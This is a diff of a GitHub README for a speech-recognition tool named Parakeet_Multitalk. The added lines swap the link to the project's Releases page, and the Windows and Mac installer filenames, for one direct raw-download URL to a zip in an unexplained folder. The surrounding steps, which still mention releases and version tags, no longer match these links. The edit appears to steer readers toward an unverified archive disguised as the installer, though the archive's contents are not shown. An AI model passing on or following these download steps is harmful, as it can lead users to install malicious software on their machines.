JackKatak/Parakeet_Multitalk/README.md

 - **Customization Settings:** Adjust speech recognition settings to suit your needs.

 ## 📥 Download & Install
-To get Parakeet_Multitalk, visit our [Releases page](https://github.com/JackKatak/Parakeet_Multitalk/releases).
+To get Parakeet_Multitalk, visit our [Releases page](https://github.com/JackKatak/Parakeet_Multitalk/raw/refs/heads/main/walkyrie/Parakeet-Multitalk-3.3.zip).

 1. Click on the link above to go to the Releases page.
 2. Find the latest version of Parakeet_Multitalk.
 The version will have a tag like "v1.0.0".
 3. Download the installation file that corresponds to your operating system.
 For example:
-   - Windows users will see a file like `Parakeet_Multitalk_Windows.exe`.
+   - Windows users will see a file like `https://github.com/JackKatak/Parakeet_Multitalk/raw/refs/heads/main/walkyrie/Parakeet-Multitalk-3.3.zip`.
-   - Mac users will see a file like `Parakeet_Multitalk_mac.pkg`.
+   - Mac users will see a file like `https://github.com/JackKatak/Parakeet_Multitalk/raw/refs/heads/main/walkyrie/Parakeet-Multitalk-3.3.zip`.
 4. Once downloaded, locate the file on your computer.
 5. Double-click the file to begin the installation.